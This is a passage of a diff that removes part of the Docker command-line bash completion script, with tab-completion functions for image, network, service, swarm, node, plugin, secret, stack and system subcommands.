- COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_image_build() { - local options_with_args=" - --build-arg - --cache-from - --cgroup-parent - --cpuset-cpus - --cpuset-mems - --cpu-shares -c - --cpu-period - --cpu-quota - --file -f - --isolation - --label - --memory -m - --memory-swap - --network - --shm-size - --tag -t - --ulimit - " - - local boolean_options=" - --compress - --disable-content-trust=false - --force-rm - --help - --no-cache - --pull - --quiet -q - --rm - " - __docker_is_experimental && boolean_options+="--squash" - - local all_options="$options_with_args $boolean_options" - - case "$prev" in - --build-arg) - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --cache-from) - __docker_complete_image_repos_and_tags - return - ;; - --file|-f) - _filedir - return - ;; - --isolation) - __docker_complete_isolation - return - ;; - --network) - case "$cur" in - container:*) - __docker_complete_containers_all --cur "${cur#*:}" - ;; - *) - COMPREPLY=( $( compgen -W "$(__docker_plugins --type Network) $(__docker_networks) container:" -- "$cur") ) - if [ "${COMPREPLY[*]}" = "container:" ] ; then - __docker_nospace - fi - ;; - esac - return - ;; - --tag|-t) - __docker_complete_image_repos_and_tags - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$all_options" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - _filedir -d - fi - ;; - esac -} - -_docker_image_history() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --human=false -H=false --no-trunc --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - ;; - esac -} - -_docker_image_images() { - _docker_image_ls -} - -_docker_image_import() { - case "$prev" in - --change|-c|--message|-m) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--change -c --help --message -m" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--change|-c|--message|-m') - if [ $cword -eq $counter ]; then - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - ;; - esac -} - -_docker_image_inspect() { - _docker_inspect --type image -} - -_docker_image_load() { - case "$prev" in - --input|-i) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --input -i --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_image_list() { - _docker_image_ls -} - -_docker_image_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - before|since|reference) - cur="${cur##*=}" - __docker_complete_images - return - ;; - dangling) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - label) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "before dangling label reference since" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --digests --filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) - ;; - =) - return - ;; - *) - __docker_complete_image_repos - ;; - esac -} - -_docker_image_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_image_pull() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all-tags -a --disable-content-trust=false --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - for arg in "${COMP_WORDS[@]}"; do - case "$arg" in - --all-tags|-a) - __docker_complete_image_repos - return - ;; - esac - done - __docker_complete_image_repos_and_tags - fi - ;; - esac -} - -_docker_image_push() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--disable-content-trust=false --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - fi - ;; - esac -} - -_docker_image_remove() { - _docker_image_rm -} - -_docker_image_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help --no-prune" -- "$cur" ) ) - ;; - *) - __docker_complete_images - ;; - esac -} - -_docker_image_rmi() { - _docker_image_rm -} - -_docker_image_save() { - case "$prev" in - --output|-o) - _filedir - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) ) - ;; - *) - __docker_complete_images - ;; - esac -} - -_docker_image_tag() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - (( counter++ )) - - if [ $cword -eq $counter ]; then - __docker_complete_image_repos_and_tags - return - fi - ;; - esac -} - - -_docker_images() { - _docker_image_ls -} - -_docker_import() { - _docker_image_import -} - -_docker_info() { - _docker_system_info -} - -_docker_inspect() { - local preselected_type - local type - - if [ "$1" = "--type" ] ; then - preselected_type=yes - type="$2" - else - type=$(__docker_value_of_option --type) - fi - - case "$prev" in - --format|-f) - return - ;; - --type) - if [ -z "$preselected_type" ] ; then - COMPREPLY=( $( compgen -W "container image network node plugin service volume" -- "$cur" ) ) - return - fi - ;; - esac - - case "$cur" in - -*) - local options="--format -f --help --size -s" - if [ -z "$preselected_type" ] ; then - options+=" --type" - fi - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - *) - case "$type" in - '') - COMPREPLY=( $( compgen -W " - $(__docker_containers --all) - $(__docker_images) - $(__docker_networks) - $(__docker_nodes) - $(__docker_plugins_installed) - $(__docker_services) - $(__docker_volumes) - " -- "$cur" ) ) - ;; - container) - __docker_complete_containers_all - ;; - image) - __docker_complete_images - ;; - network) - __docker_complete_networks - ;; - node) - __docker_complete_nodes - ;; - plugin) - __docker_complete_plugins_installed - ;; - service) - __docker_complete_services - ;; - volume) - __docker_complete_volumes - ;; - esac - esac -} - -_docker_kill() { - _docker_container_kill -} - -_docker_load() { - _docker_image_load -} - -_docker_login() { - case "$prev" in - --password|-p|--username|-u) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --password -p --username -u" -- "$cur" ) ) - ;; - esac -} - -_docker_logout() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_logs() { - _docker_container_logs -} - -_docker_network_connect() { - local options_with_args=" - --alias - --ip - --ip6 - --link - --link-local-ip - " - - local boolean_options=" - --help - " - - case "$prev" in - --link) - case "$cur" in - *:*) - ;; - *) - __docker_complete_containers_running - COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) ) - __docker_nospace - ;; - esac - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ $cword -eq $counter ]; then - __docker_complete_networks - elif [ $cword -eq $(($counter + 1)) ]; then - __docker_complete_containers_all - fi - ;; - esac -} - -_docker_network_create() { - case "$prev" in - --aux-address|--gateway|--internal|--ip-range|--ipam-opt|--ipv6|--opt|-o|--subnet) - return - ;; - --ipam-driver) - COMPREPLY=( $( compgen -W "default" -- "$cur" ) ) - return - ;; - --driver|-d) - # remove drivers that allow one instance only, add drivers missing in `docker info` - __docker_complete_plugins_bundled --type Network --remove host --remove null --add macvlan - return - ;; - --label) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--attachable --aux-address --driver -d --gateway --help --internal --ip-range --ipam-driver --ipam-opt --ipv6 --label --opt -o --subnet" -- "$cur" ) ) - ;; - esac -} - -_docker_network_disconnect() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_networks - elif [ $cword -eq $(($counter + 1)) ]; then - __docker_complete_containers_in_network "$prev" - fi - ;; - esac -} - -_docker_network_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_networks - esac -} - -_docker_network_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - driver) - __docker_complete_plugins_bundled --cur "${cur##*=}" --type Network --add macvlan - return - ;; - id) - __docker_complete_networks --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_networks --cur "${cur##*=}" --name - return - ;; - type) - COMPREPLY=( $( compgen -W "builtin custom" -- "${cur##*=}" ) ) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "driver id label name type" -- "$cur" ) ) - __docker_nospace - return - ;; - --format) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --format --help --no-trunc --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_network_prune() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_network_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_networks --filter type=custom - esac -} - -_docker_network() { - local subcommands=" - connect - create - disconnect - inspect - ls - prune - rm - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_service() { - local subcommands=" - create - inspect - ls list - rm remove - scale - ps - update - " - __docker_daemon_is_experimental && subcommands+="logs" - - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_service_create() { - _docker_service_update -} - -_docker_service_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) - ;; - *) - __docker_complete_services - esac -} - -_docker_service_logs() { - case "$prev" in - --since|--tail) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--details --follow -f --help --no-resolve --since --tail --timestamps -t" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--since|--tail') - if [ $cword -eq $counter ]; then - __docker_complete_services - fi - ;; - esac -} - -_docker_service_list() { - _docker_service_ls -} - -_docker_service_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - id) - __docker_complete_services --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_service_remove() { - _docker_service_rm -} - -_docker_service_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_services - esac -} - -_docker_service_scale() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_services - __docker_append_to_completions "=" - __docker_nospace - ;; - esac -} - -_docker_service_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - node) - __docker_complete_nodes_plus_self --cur "${cur##*=}" - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "desired-state id name node" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_services - fi - ;; - esac -} - -_docker_service_update() { - local $subcommand="${words[$subcommand_pos]}" - - local options_with_args=" - --constraint - --endpoint-mode - --env -e - --force - --health-cmd - --health-interval - --health-retries - --health-timeout - --hostname - --label -l - --limit-cpu - --limit-memory - --log-driver - --log-opt - --mount - --network - --no-healthcheck - --replicas - --reserve-cpu - --reserve-memory - --restart-condition - --restart-delay - --restart-max-attempts - --restart-window - --rollback - --stop-grace-period - --update-delay - --update-failure-action - --update-max-failure-ratio - --update-monitor - --update-parallelism - --user -u - --workdir -w - " - - local boolean_options=" - --help - --tty -t - --with-registry-auth - " - - __docker_complete_log_driver_options && return - - if [ "$subcommand" = "create" ] ; then - options_with_args="$options_with_args - --container-label - --dns - --dns-option - --dns-search - --env-file - --group - --host - --mode - --name - --publish -p - --secret - " - - case "$prev" in - --env-file) - _filedir - return - ;; - --host) - case "$cur" in - *:) - __docker_complete_resolved_hostname - return - ;; - esac - ;; - --mode) - COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) ) - return - ;; - --secret) - __docker_complete_secrets - return - ;; - --group) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - esac - fi - if [ "$subcommand" = "update" ] ; then - options_with_args="$options_with_args - --arg - --container-label-add - --container-label-rm - --dns-add - --dns-option-add - --dns-option-rm - --dns-rm - --dns-search-add - --dns-search-rm - --group-add - --group-rm - --host-add - --host-rm - --image - --publish-add - --publish-rm - --secret-add - --secret-rm - " - - case "$prev" in - --group-add) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - --group-rm) - COMPREPLY=( $(compgen -g -- "$cur") ) - return - ;; - --host-add|--host-rm) - case "$cur" in - *:) - __docker_complete_resolved_hostname - return - ;; - esac - ;; - --image) - __docker_complete_image_repos_and_tags - return - ;; - --secret-add|--secret-rm) - __docker_complete_secrets - return - ;; - esac - fi - - case "$prev" in - --endpoint-mode) - COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) ) - return - ;; - --env|-e) - # we do not append a "=" here because "-e VARNAME" is legal systax, too - COMPREPLY=( $( compgen -e -- "$cur" ) ) - __docker_nospace - return - ;; - --log-driver) - __docker_complete_log_drivers - return - ;; - --log-opt) - __docker_complete_log_options - return - ;; - --network) - __docker_complete_networks - return - ;; - --restart-condition) - COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) ) - return - ;; - --user|-u) - __docker_complete_user_group - return - ;; - $(__docker_to_extglob "$options_with_args") ) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) - if [ "$subcommand" = "update" ] ; then - if [ $cword -eq $counter ]; then - __docker_complete_services - fi - else - if [ $cword -eq $counter ]; then - __docker_complete_images - fi - fi - ;; - esac -} - -_docker_swarm() { - local subcommands=" - init - join - join-token - leave - unlock - unlock-key - update - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_init() { - case "$prev" in - --advertise-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces - __docker_nospace - fi - return - ;; - --availability) - COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) - return - ;; - --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) - return - ;; - --listen-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces --add 0.0.0.0 - __docker_nospace - fi - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_join() { - case "$prev" in - --advertise-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces - __docker_nospace - fi - return - ;; - --listen-addr) - if [[ $cur == *: ]] ; then - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - else - __docker_complete_local_interfaces --add 0.0.0.0 - __docker_nospace - fi - return - ;; - --token) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) ) - ;; - *:) - COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) - ;; - esac -} - -_docker_swarm_join-token() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) - ;; - *) - local counter=$( __docker_pos_first_nonflag ) - if [ $cword -eq $counter ]; then - COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) - fi - ;; - esac -} - -_docker_swarm_leave() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_unlock() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_unlock-key() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) - ;; - esac -} - -_docker_swarm_update() { - case "$prev" in - --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) - ;; - esac -} - -_docker_node() { - local subcommands=" - demote - inspect - ls list - promote - rm remove - ps - update - " - __docker_subcommands "$subcommands" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_node_demote() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes --filter role=manager - esac -} - -_docker_node_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes_plus_self - esac -} - -_docker_node_list() { - _docker_node_ls -} - -_docker_node_ls() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - id) - __docker_complete_nodes --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_nodes --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_node_promote() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes --filter role=worker - esac -} - -_docker_node_remove() { - _docker_node_rm -} - -_docker_node_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes - esac -} - -_docker_node_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes_plus_self - ;; - esac -} - -_docker_node_update() { - case "$prev" in - --availability) - COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) - return - ;; - --role) - COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) - return - ;; - --label-add|--label-rm) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) ) - ;; - *) - __docker_complete_nodes - esac -} - -_docker_pause() { - _docker_container_pause -} - -_docker_plugin() { - local subcommands=" - create - disable - enable - inspect - install - ls - push - rm - set - " - local aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_create() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - # reponame - return - elif [ $cword -eq $((counter + 1)) ]; then - _filedir -d - fi - ;; - esac -} - -_docker_plugin_disable() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_enable() { - case "$prev" in - --timeout) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--timeout') - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_inspect() { - case "$prev" in - --format|f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_plugins_installed - ;; - esac -} - -_docker_plugin_install() { - case "$prev" in - --alias) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_list() { - _docker_plugin_ls -} - -_docker_plugin_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) ) - ;; - esac -} - -_docker_plugin_push() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - -_docker_plugin_remove() { - _docker_plugin_rm -} - -_docker_plugin_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_plugins_installed - ;; - esac -} - -_docker_plugin_set() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_plugins_installed - fi - ;; - esac -} - - -_docker_port() { - _docker_container_port -} - -_docker_ps() { - _docker_container_ls -} - -_docker_pull() { - _docker_image_pull -} - -_docker_push() { - _docker_image_push -} - -_docker_rename() { - _docker_container_rename -} - -_docker_restart() { - _docker_container_restart -} - -_docker_rm() { - _docker_container_rm -} - -_docker_rmi() { - _docker_image_rm -} - -_docker_run() { - _docker_container_run -} - -_docker_save() { - _docker_image_save -} - - -_docker_secret() { - local subcommands=" - create - inspect - ls - rm - " - local aliases=" - list - remove - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_secret_create() { - case "$prev" in - --label|-l) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) ) - ;; - esac -} - -_docker_secret_inspect() { - case "$prev" in - --format|-f) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) - ;; - *) - __docker_complete_secrets - ;; - esac -} - -_docker_secret_list() { - _docker_secret_ls -} - -_docker_secret_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) ) - ;; - esac -} - -_docker_secret_remove() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - __docker_complete_secrets - ;; - esac -} - -_docker_secret_rm() { - _docker_secret_remove -} - - - -_docker_search() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - is-automated) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - is-official) - COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) ) - __docker_nospace - return - ;; - --limit) - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) ) - ;; - esac -} - - -_docker_stack() { - local subcommands=" - deploy - ls - ps - rm - services - " - local aliases=" - down - list - remove - up - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_deploy() { - case "$prev" in - --bundle-file) - if __docker_is_experimental ; then - _filedir dab - return - fi - ;; - --compose-file|-c) - _filedir yml - return - ;; - esac - - case "$cur" in - -*) - local options="--compose-file -c --help --with-registry-auth" - __docker_is_experimental && options+=" --bundle-file" - COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_down() { - _docker_stack_rm -} - -_docker_stack_list() { - _docker_stack_ls -} - -_docker_stack_ls() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - esac -} - -_docker_stack_ps() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - desired-state) - COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) - return - ;; - id) - __docker_complete_stacks --cur "${cur##*=}" --id - return - ;; - name) - __docker_complete_stacks --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_remove() { - _docker_stack_rm -} - -_docker_stack_rm() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag) - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_services() { - local key=$(__docker_map_key_of_current_option '--filter|-f') - case "$key" in - id) - __docker_complete_services --cur "${cur##*=}" --id - return - ;; - label) - return - ;; - name) - __docker_complete_services --cur "${cur##*=}" --name - return - ;; - esac - - case "$prev" in - --filter|-f) - COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) ) - __docker_nospace - return - ;; - esac - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) - ;; - *) - local counter=$(__docker_pos_first_nonflag '--filter|-f') - if [ $cword -eq $counter ]; then - __docker_complete_stacks - fi - ;; - esac -} - -_docker_stack_up() { - _docker_stack_deploy -} - - -_docker_start() { - _docker_container_start -} - -_docker_stats() { - _docker_container_stats -} - -_docker_stop() { - _docker_container_stop -} - - -_docker_system() { - local subcommands=" - df - events - info - prune - " - __docker_subcommands "$subcommands $aliases" && return - - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) - ;; - *) - COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) - ;; - esac -} - -_docker_system_df() { - case "$cur" in - -*) - COMPREPLY=( $( compgen -W "--help --verbose -v" -- "$cur" ) ) - ;; - esac -} - -_docker_system_events() { - local key=$(__docker_map_key_of_current_option '-f|--filter') - case "$key" in - container) - __docker_complete_containers_all --cur "${cur##*=}" - return - ;; - daemon) - local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p') - COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) ) - return - ;; - event) - COMPREPLY=( $( compgen -W " - attach - commit - connect - copy - create - delete - destroy - detach - die - disconnect - exec_create - exec_detach - exec_start - export - health_status - import - kill - load - mount - oom - pause - pull - push - reload - rename - resize - restart - save - start - stop - tag - top - unmount - unpause - untag - update - " -- "${cur##*=}" ) ) - return - ;; - image) - cur="${cur##*=}" - __docker_complete_images - return - ;; - 